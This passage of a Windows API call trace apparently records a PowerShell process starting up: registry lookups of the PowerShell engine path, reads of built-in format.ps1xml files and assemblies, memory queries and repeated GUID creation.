	[0506.721] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d0c8 | out: phkResult=0x14d0c8*=0x2f8) returned 0x0
	[0506.721] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d04c, lpData=0x0, lpcbData=0x14d048*=0x0 | out: lpType=0x14d04c*=0x1, lpData=0x0, lpcbData=0x14d048*=0x56) returned 0x0
	[0506.721] CoTaskMemAlloc (cb=0x5a) returned 0x1b959230
	[0506.721] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d01c, lpData=0x1b959230, lpcbData=0x14d018*=0x56 | out: lpType=0x14d01c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14d018*=0x56) returned 0x0
	[0506.721] CoTaskMemFree (pv=0x1b959230) 
	[0506.721] RegCloseKey (hKey=0x2f8) returned 0x0
	[0506.721] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14cd10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0506.722] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14cbc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0506.731] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x14c550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0506.733] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14c550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0506.742] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x14c550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0506.750] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0507.914] VirtualQuery (in: lpAddress=0x14bb60, lpBuffer=0x14ca20, dwLength=0x30 | out: lpBuffer=0x14ca20*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0507.914] CoCreateGuid (in: pguid=0x14d2f0 | out: pguid=0x14d2f0*(Data1=0x32151741, Data2=0x3dc3, Data3=0x4828, Data4=([0]=0xa4, [1]=0x60, [2]=0x40, [3]=0x6d, [4]=0x80, [5]=0xe7, [6]=0xfa, [7]=0x11))) returned 0x0
	[0507.915] CoCreateGuid (in: pguid=0x14d2f0 | out: pguid=0x14d2f0*(Data1=0xe25ba4a2, Data2=0xed84, Data3=0x4678, Data4=([0]=0xbe, [1]=0x49, [2]=0x83, [3]=0xfb, [4]=0xa3, [5]=0x4, [6]=0x8a, [7]=0xd6))) returned 0x0
	[0507.916] VirtualQuery (in: lpAddress=0x14bd10, lpBuffer=0x14cbd0, dwLength=0x30 | out: lpBuffer=0x14cbd0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0507.917] VirtualQuery (in: lpAddress=0x14bd10, lpBuffer=0x14cbd0, dwLength=0x30 | out: lpBuffer=0x14cbd0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0507.918] CoCreateGuid (in: pguid=0x14d2f0 | out: pguid=0x14d2f0*(Data1=0x1067c388, Data2=0xfb5, Data3=0x4272, Data4=([0]=0xaf, [1]=0x16, [2]=0x9f, [3]=0x7, [4]=0xfb, [5]=0xaf, [6]=0x2b, [7]=0x54))) returned 0x0
	[0507.921] CoCreateGuid (in: pguid=0x14d2f0 | out: pguid=0x14d2f0*(Data1=0x351e56db, Data2=0x98b8, Data3=0x4429, Data4=([0]=0xbf, [1]=0x11, [2]=0xf0, [3]=0x6a, [4]=0x53, [5]=0x9, [6]=0x49, [7]=0x6b))) returned 0x0
	[0507.922] VirtualQuery (in: lpAddress=0x14bf60, lpBuffer=0x14ce20, dwLength=0x30 | out: lpBuffer=0x14ce20*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0507.923] CoCreateGuid (in: pguid=0x14d2f0 | out: pguid=0x14d2f0*(Data1=0x337f1800, Data2=0x8d97, Data3=0x4e6c, Data4=([0]=0xbf, [1]=0x58, [2]=0x7, [3]=0xce, [4]=0xe2, [5]=0x25, [6]=0x4c, [7]=0x98))) returned 0x0
	[0508.455] VirtualQuery (in: lpAddress=0x14bd80, lpBuffer=0x14cc40, dwLength=0x30 | out: lpBuffer=0x14cc40*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0508.456] VirtualQuery (in: lpAddress=0x14b5d0, lpBuffer=0x14c490, dwLength=0x30 | out: lpBuffer=0x14c490*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0508.456] CoCreateGuid (in: pguid=0x14d2f0 | out: pguid=0x14d2f0*(Data1=0xcae6df2e, Data2=0x6e3d, Data3=0x4aa9, Data4=([0]=0x82, [1]=0x3d, [2]=0xd5, [3]=0x66, [4]=0xc9, [5]=0x96, [6]=0xde, [7]=0x1d))) returned 0x0
	[0508.457] CoCreateGuid (in: pguid=0x14d2f0 | out: pguid=0x14d2f0*(Data1=0x438c6048, Data2=0x5550, Data3=0x489e, Data4=([0]=0x8e, [1]=0xa8, [2]=0xf3, [3]=0x6f, [4]=0x35, [5]=0xb8, [6]=0x4f, [7]=0x38))) returned 0x0
	[0508.457] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x320
	[0508.457] GetFileType (hFile=0x320) returned 0x1
	[0508.457] SetErrorMode (uMode=0x1) returned 0x1
	[0508.457] GetFileType (hFile=0x320) returned 0x1
	[0508.457] ReadFile (in: hFile=0x320, lpBuffer=0x2c90210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x2c90210*, lpNumberOfBytesRead=0x14d038*=0x1000, lpOverlapped=0x0) returned 1
	[0508.458] ReadFile (in: hFile=0x320, lpBuffer=0x2c90210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x2c90210*, lpNumberOfBytesRead=0x14d038*=0x1000, lpOverlapped=0x0) returned 1
	[0508.458] ReadFile (in: hFile=0x320, lpBuffer=0x2c90210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x2c90210*, lpNumberOfBytesRead=0x14d038*=0x1000, lpOverlapped=0x0) returned 1
	[0508.458] ReadFile (in: hFile=0x320, lpBuffer=0x2c90210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x2c90210*, lpNumberOfBytesRead=0x14d038*=0x1000, lpOverlapped=0x0) returned 1
	[0508.458] ReadFile (in: hFile=0x320, lpBuffer=0x2c90210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x2c90210*, lpNumberOfBytesRead=0x14d038*=0x1000, lpOverlapped=0x0) returned 1
	[0508.459] ReadFile (in: hFile=0x320, lpBuffer=0x2c90210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x2c90210*, lpNumberOfBytesRead=0x14d038*=0x1000, lpOverlapped=0x0) returned 1
	[0508.459] ReadFile (in: hFile=0x320, lpBuffer=0x2c90210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x2c90210*, lpNumberOfBytesRead=0x14d038*=0x1000, lpOverlapped=0x0) returned 1
	[0508.459] ReadFile (in: hFile=0x320, lpBuffer=0x2c90210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x2c90210*, lpNumberOfBytesRead=0x14d038*=0x1000, lpOverlapped=0x0) returned 1
	[0508.460] ReadFile (in: hFile=0x320, lpBuffer=0x2c90210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x2c90210*, lpNumberOfBytesRead=0x14d038*=0x1000, lpOverlapped=0x0) returned 1
	[0508.460] ReadFile (in: hFile=0x320, lpBuffer=0x2c90210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x2c90210*, lpNumberOfBytesRead=0x14d038*=0x1000, lpOverlapped=0x0) returned 1
	[0508.460] ReadFile (in: hFile=0x320, lpBuffer=0x2c90210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x2c90210*, lpNumberOfBytesRead=0x14d038*=0x1000, lpOverlapped=0x0) returned 1
	[0508.460] ReadFile (in: hFile=0x320, lpBuffer=0x2c90210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x2c90210*, lpNumberOfBytesRead=0x14d038*=0x1000, lpOverlapped=0x0) returned 1
	[0508.461] ReadFile (in: hFile=0x320, lpBuffer=0x2c90210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x2c90210*, lpNumberOfBytesRead=0x14d038*=0x1000, lpOverlapped=0x0) returned 1
	[0508.461] ReadFile (in: hFile=0x320, lpBuffer=0x2c90210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x2c90210*, lpNumberOfBytesRead=0x14d038*=0x1000, lpOverlapped=0x0) returned 1
	[0508.461] ReadFile (in: hFile=0x320, lpBuffer=0x2c90210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x2c90210*, lpNumberOfBytesRead=0x14d038*=0x1000, lpOverlapped=0x0) returned 1
	[0508.461] ReadFile (in: hFile=0x320, lpBuffer=0x2c90210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x2c90210*, lpNumberOfBytesRead=0x14d038*=0x1000, lpOverlapped=0x0) returned 1
	[0508.462] ReadFile (in: hFile=0x320, lpBuffer=0x2c90210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x2c90210*, lpNumberOfBytesRead=0x14d038*=0x1000, lpOverlapped=0x0) returned 1
	[0508.462] ReadFile (in: hFile=0x320, lpBuffer=0x2c90210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x2c90210*, lpNumberOfBytesRead=0x14d038*=0xbce, lpOverlapped=0x0) returned 1
	[0508.463] ReadFile (in: hFile=0x320, lpBuffer=0x2c8f946, nNumberOfBytesToRead=0x32, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x2c8f946*, lpNumberOfBytesRead=0x14d038*=0x0, lpOverlapped=0x0) returned 1
	[0508.463] ReadFile (in: hFile=0x320, lpBuffer=0x2c90210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x2c90210*, lpNumberOfBytesRead=0x14d038*=0x0, lpOverlapped=0x0) returned 1
	[0508.463] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d0c8 | out: phkResult=0x14d0c8*=0x320) returned 0x0
	[0508.463] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d04c, lpData=0x0, lpcbData=0x14d048*=0x0 | out: lpType=0x14d04c*=0x1, lpData=0x0, lpcbData=0x14d048*=0x56) returned 0x0
	[0508.463] CoTaskMemAlloc (cb=0x5a) returned 0x3ce5c0
	[0508.463] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d01c, lpData=0x3ce5c0, lpcbData=0x14d018*=0x56 | out: lpType=0x14d01c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14d018*=0x56) returned 0x0
	[0508.463] CoTaskMemFree (pv=0x3ce5c0) 
	[0508.463] RegCloseKey (hKey=0x320) returned 0x0
	[0508.464] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14cd10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0508.464] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14cbc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0508.465] CoCreateGuid (in: pguid=0x14d2f0 | out: pguid=0x14d2f0*(Data1=0x1ca86b20, Data2=0xd5a7, Data3=0x4637, Data4=([0]=0x8f, [1]=0x79, [2]=0x69, [3]=0x47, [4]=0x93, [5]=0xac, [6]=0x14, [7]=0xb7))) returned 0x0
	[0508.465] CoCreateGuid (in: pguid=0x14d2f0 | out: pguid=0x14d2f0*(Data1=0x4b5f8e0a, Data2=0x7b23, Data3=0x439b, Data4=([0]=0x91, [1]=0xd6, [2]=0x89, [3]=0xab, [4]=0xc3, [5]=0x5a, [6]=0x19, [7]=0xc7))) returned 0x0
	[0508.466] CoCreateGuid (in: pguid=0x14d2f0 | out: pguid=0x14d2f0*(Data1=0xc42dd503, Data2=0xe2f2, Data3=0x4e3b, Data4=([0]=0x87, [1]=0x6b, [2]=0x7a, [3]=0xeb, [4]=0xb, [5]=0x77, [6]=0x4b, [7]=0xae))) returned 0x0
	[0508.466] CoCreateGuid (in: pguid=0x14d2f0 | out: pguid=0x14d2f0*(Data1=0x70dc03fc, Data2=0xd6df, Data3=0x4171, Data4=([0]=0x94, [1]=0x9c, [2]=0xf1, [3]=0x50, [4]=0x28, [5]=0x4e, [6]=0x58, [7]=0x48))) returned 0x0
	[0508.467] CoCreateGuid (in: pguid=0x14d2f0 | out: pguid=0x14d2f0*(Data1=0x4d028340, Data2=0x3ab3, Data3=0x4001, Data4=([0]=0xb7, [1]=0x67, [2]=0x94, [3]=0x1b, [4]=0xb0, [5]=0x1d, [6]=0x66, [7]=0x44))) returned 0x0
	[0508.467] CoCreateGuid (in: pguid=0x14d2f0 | out: pguid=0x14d2f0*(Data1=0x2c4c93b, Data2=0x657d, Data3=0x435d, Data4=([0]=0xb7, [1]=0x30, [2]=0x7c, [3]=0x7c, [4]=0x1d, [5]=0x7, [6]=0x2b, [7]=0x32))) returned 0x0
	[0508.468] VirtualQuery (in: lpAddress=0x14bca0, lpBuffer=0x14cb60, dwLength=0x30 | out: lpBuffer=0x14cb60*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0508.469] CoCreateGuid (in: pguid=0x14d2f0 | out: pguid=0x14d2f0*(Data1=0x21837786, Data2=0x23e8, Data3=0x4589, Data4=([0]=0x8e, [1]=0x96, [2]=0x51, [3]=0xd0, [4]=0x97, [5]=0xd2, [6]=0x82, [7]=0x88))) returned 0x0
	[0508.469] VirtualQuery (in: lpAddress=0x14bca0, lpBuffer=0x14cb60, dwLength=0x30 | out: lpBuffer=0x14cb60*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0508.470] CoCreateGuid (in: pguid=0x14d2f0 | out: pguid=0x14d2f0*(Data1=0xe947ed8d, Data2=0xc952, Data3=0x4d76, Data4=([0]=0xac, [1]=0x8f, [2]=0x1d, [3]=0x29, [4]=0xdb, [5]=0xee, [6]=0x2b, [7]=0x6c))) returned 0x0
	[0508.470] CoCreateGuid (in: pguid=0x14d2f0 | out: pguid=0x14d2f0*(Data1=0xa6134957, Data2=0x73e3, Data3=0x4b44, Data4=([0]=0xa4, [1]=0xb, [2]=0x6c, [3]=0x13, [4]=0x2a, [5]=0xbb, [6]=0x55, [7]=0xa8))) returned 0x0
	[0508.470] CoCreateGuid (in: pguid=0x14d2f0 | out: pguid=0x14d2f0*(Data1=0xca6a2622, Data2=0x3708, Data3=0x4aa5, Data4=([0]=0xaa, [1]=0x1b, [2]=0xad, [3]=0x82, [4]=0xa7, [5]=0xb6, [6]=0x8d, [7]=0xe3))) returned 0x0
	[0508.470] CoCreateGuid (in: pguid=0x14d2f0 | out: pguid=0x14d2f0*(Data1=0x39f5814d, Data2=0x9325, Data3=0x4843, Data4=([0]=0x92, [1]=0xbf, [2]=0xdc, [3]=0xea, [4]=0x92, [5]=0x20, [6]=0x8c, [7]=0xa3))) returned 0x0
	[0508.471] CoCreateGuid (in: pguid=0x14d2f0 | out: pguid=0x14d2f0*(Data1=0xa25ea227, Data2=0xe377, Data3=0x49ef, Data4=([0]=0x94, [1]=0xc5, [2]=0x2, [3]=0xab, [4]=0xa2, [5]=0xf7, [6]=0x4a, [7]=0xec))) returned 0x0
	[0508.471] CoCreateGuid (in: pguid=0x14d2f0 | out: pguid=0x14d2f0*(Data1=0x3d1639bf, Data2=0xad6b, Data3=0x4ad1, Data4=([0]=0x90, [1]=0x57, [2]=0xb, [3]=0x7e, [4]=0x11, [5]=0x76, [6]=0x41, [7]=0xc4))) returned 0x0
	[0508.471] CoCreateGuid (in: pguid=0x14d2f0 | out: pguid=0x14d2f0*(Data1=0x5f26c41f, Data2=0xecde, Data3=0x489e, Data4=([0]=0x88, [1]=0x5a, [2]=0x4, [3]=0xe4, [4]=0xa7, [5]=0x56, [6]=0xd, [7]=0x8e))) returned 0x0
	[0508.471] CoCreateGuid (in: pguid=0x14d2f0 | out: pguid=0x14d2f0*(Data1=0xf73985f0, Data2=0xd573, Data3=0x4027, Data4=([0]=0x8b, [1]=0x72, [2]=0x47, [3]=0x9e, [4]=0x6f, [5]=0x57, [6]=0x66, [7]=0x3c))) returned 0x0
	[0508.471] CoCreateGuid (in: pguid=0x14d2f0 | out: pguid=0x14d2f0*(Data1=0x1144a912, Data2=0x8c97, Data3=0x4eb1, Data4=([0]=0xaf, [1]=0xbf, [2]=0x3, [3]=0xe4, [4]=0x66, [5]=0x65, [6]=0x27, [7]=0x20))) returned 0x0
	[0508.471] CoCreateGuid (in: pguid=0x14d2f0 | out: pguid=0x14d2f0*(Data1=0x975d28e2, Data2=0xc039, Data3=0x4341, Data4=([0]=0x8d, [1]=0xb0, [2]=0xa9, [3]=0xa4, [4]=0x30, [5]=0x4d, [6]=0x7e, [7]=0xf8))) returned 0x0
	[0508.472] CoCreateGuid (in: pguid=0x14d2f0 | out: pguid=0x14d2f0*(Data1=0x654e3bd7, Data2=0x213c, Data3=0x438f, Data4=([0]=0xa7, [1]=0x17, [2]=0x6e, [3]=0xa7, [4]=0x3, [5]=0xa4, [6]=0x2c, [7]=0x9e))) returned 0x0
	[0508.472] CoCreateGuid (in: pguid=0x14d2f0 | out: pguid=0x14d2f0*(Data1=0x10cf21c5, Data2=0x2fce, Data3=0x46e3, Data4=([0]=0x84, [1]=0x53, [2]=0xb, [3]=0x14, [4]=0x74, [5]=0x91, [6]=0xa2, [7]=0xf5))) returned 0x0
	[0508.472] CoCreateGuid (in: pguid=0x14d2f0 | out: pguid=0x14d2f0*(Data1=0x8b926074, Data2=0x9175, Data3=0x464d, Data4=([0]=0xa2, [1]=0x3b, [2]=0xf1, [3]=0xa, [4]=0x32, [5]=0x5d, [6]=0x9d, [7]=0xa7))) returned 0x0
	[0508.472] CoCreateGuid (in: pguid=0x14d2f0 | out: pguid=0x14d2f0*(Data1=0xe4eff734, Data2=0xc89d, Data3=0x494d, Data4=([0]=0x80, [1]=0x76, [2]=0xf9, [3]=0xa9, [4]=0x6f, [5]=0x84, [6]=0x7f, [7]=0x6e))) returned 0x0
	[0508.472] CoCreateGuid (in: pguid=0x14d2f0 | out: pguid=0x14d2f0*(Data1=0x82d5b33, Data2=0x3975, Data3=0x4568, Data4=([0]=0x98, [1]=0xe5, [2]=0x1b, [3]=0xce, [4]=0x94, [5]=0xe0, [6]=0xc1, [7]=0xa2))) returned 0x0
	[0508.472] CoCreateGuid (in: pguid=0x14d2f0 | out: pguid=0x14d2f0*(Data1=0x392856dc, Data2=0x6e67, Data3=0x4a4f, Data4=([0]=0x93, [1]=0x33, [2]=0x8d, [3]=0xec, [4]=0x5b, [5]=0xf8, [6]=0x84, [7]=0xa9))) returned 0x0
	[0508.472] CoCreateGuid (in: pguid=0x14d2f0 | out: pguid=0x14d2f0*(Data1=0xa0ba60d1, Data2=0x38e9, Data3=0x4ee4, Data4=([0]=0xbf, [1]=0xda, [2]=0x37, [3]=0x19, [4]=0xa5, [5]=0xa, [6]=0x8, [7]=0x5e))) returned 0x0
	[0508.472] CoCreateGuid (in: pguid=0x14d2f0 | out: pguid=0x14d2f0*(Data1=0xf5d1aefb, Data2=0x5811, Data3=0x49d8, Data4=([0]=0x98, [1]=0x14, [2]=0x70, [3]=0x72, [4]=0x26, [5]=0x8f, [6]=0x69, [7]=0xca))) returned 0x0
	[0508.472] CoCreateGuid (in: pguid=0x14d2f0 | out: pguid=0x14d2f0*(Data1=0xa85ad1b9, Data2=0x5aa1, Data3=0x48fe, Data4=([0]=0x83, [1]=0xf0, [2]=0x8b, [3]=0x3e, [4]=0x4, [5]=0xfd, [6]=0x7b, [7]=0x31))) returned 0x0
	[0508.473] CoCreateGuid (in: pguid=0x14d2f0 | out: pguid=0x14d2f0*(Data1=0x75fc1ab6, Data2=0xd8bd, Data3=0x49bd, Data4=([0]=0x90, [1]=0x3, [2]=0x1b, [3]=0x89, [4]=0xea, [5]=0x2e, [6]=0xa2, [7]=0x96))) returned 0x0
	[0508.473] CoCreateGuid (in: pguid=0x14d2f0 | out: pguid=0x14d2f0*(Data1=0x7dfd4513, Data2=0xd75, Data3=0x4284, Data4=([0]=0xbb, [1]=0xaa, [2]=0x87, [3]=0x99, [4]=0xae, [5]=0x23, [6]=0x33, [7]=0x99))) returned 0x0
	[0508.473] CoCreateGuid (in: pguid=0x14d2f0 | out: pguid=0x14d2f0*(Data1=0xce96b8d4, Data2=0xc629, Data3=0x41bf, Data4=([0]=0x98, [1]=0x96, [2]=0x9f, [3]=0x99, [4]=0xe1, [5]=0x33, [6]=0x49, [7]=0x2))) returned 0x0
	[0508.473] CoCreateGuid (in: pguid=0x14d2f0 | out: pguid=0x14d2f0*(Data1=0xce09a3bf, Data2=0x6f0e, Data3=0x4e5e, Data4=([0]=0xab, [1]=0xa8, [2]=0x15, [3]=0x98, [4]=0x3c, [5]=0x87, [6]=0x8d, [7]=0x7f))) returned 0x0
	[0508.473] CoCreateGuid (in: pguid=0x14d2f0 | out: pguid=0x14d2f0*(Data1=0x4d55ac18, Data2=0xfddd, Data3=0x419e, Data4=([0]=0x9a, [1]=0x42, [2]=0x7b, [3]=0xdc, [4]=0x78, [5]=0x1c, [6]=0x78, [7]=0xbc))) returned 0x0
	[0508.473] CoCreateGuid (in: pguid=0x14d2f0 | out: pguid=0x14d2f0*(Data1=0x9a9f328, Data2=0xdfba, Data3=0x49dc, Data4=([0]=0x96, [1]=0x8b, [2]=0xbc, [3]=0x4c, [4]=0x6f, [5]=0x2a, [6]=0xbd, [7]=0x0))) returned 0x0
	[0508.473] CoCreateGuid (in: pguid=0x14d2f0 | out: pguid=0x14d2f0*(Data1=0x20d4bb96, Data2=0xb27b, Data3=0x4124, Data4=([0]=0xba, [1]=0x5b, [2]=0x4a, [3]=0xfe, [4]=0xd1, [5]=0xc4, [6]=0xae, [7]=0x37))) returned 0x0
	[0508.473] CoCreateGuid (in: pguid=0x14d2f0 | out: pguid=0x14d2f0*(Data1=0x5ef9595f, Data2=0xaaf7, Data3=0x4bcd, Data4=([0]=0xa1, [1]=0x59, [2]=0x95, [3]=0xf6, [4]=0x12, [5]=0xce, [6]=0x3c, [7]=0x2b))) returned 0x0
	[0508.473] CoCreateGuid (in: pguid=0x14d2f0 | out: pguid=0x14d2f0*(Data1=0x2b1137b, Data2=0x832e, Data3=0x44b1, Data4=([0]=0xaf, [1]=0x17, [2]=0xa9, [3]=0x7c, [4]=0x61, [5]=0x76, [6]=0xe4, [7]=0xee))) returned 0x0
	[0508.474] CoCreateGuid (in: pguid=0x14d2f0 | out: pguid=0x14d2f0*(Data1=0x4576937d, Data2=0x1a74, Data3=0x4a2e, Data4=([0]=0x8e, [1]=0xde, [2]=0x4, [3]=0x81, [4]=0x59, [5]=0x5c, [6]=0xe8, [7]=0x3a))) returned 0x0
	[0508.474] CoCreateGuid (in: pguid=0x14d2f0 | out: pguid=0x14d2f0*(Data1=0xfdef2e83, Data2=0xad65, Data3=0x4738, Data4=([0]=0xbd, [1]=0xf7, [2]=0x26, [3]=0xfd, [4]=0xed, [5]=0xfa, [6]=0x68, [7]=0xd4))) returned 0x0
	[0508.474] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x320
	[0508.474] GetFileType (hFile=0x320) returned 0x1
	[0508.475] SetErrorMode (uMode=0x1) returned 0x1
	[0508.475] GetFileType (hFile=0x320) returned 0x1
	[0508.475] ReadFile (in: hFile=0x320, lpBuffer=0x2da07f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x2da07f8*, lpNumberOfBytesRead=0x14d038*=0x1000, lpOverlapped=0x0) returned 1
	[0508.476] ReadFile (in: hFile=0x320, lpBuffer=0x2da07f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x2da07f8*, lpNumberOfBytesRead=0x14d038*=0x1000, lpOverlapped=0x0) returned 1
	[0508.476] ReadFile (in: hFile=0x320, lpBuffer=0x2da07f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x2da07f8*, lpNumberOfBytesRead=0x14d038*=0x1000, lpOverlapped=0x0) returned 1
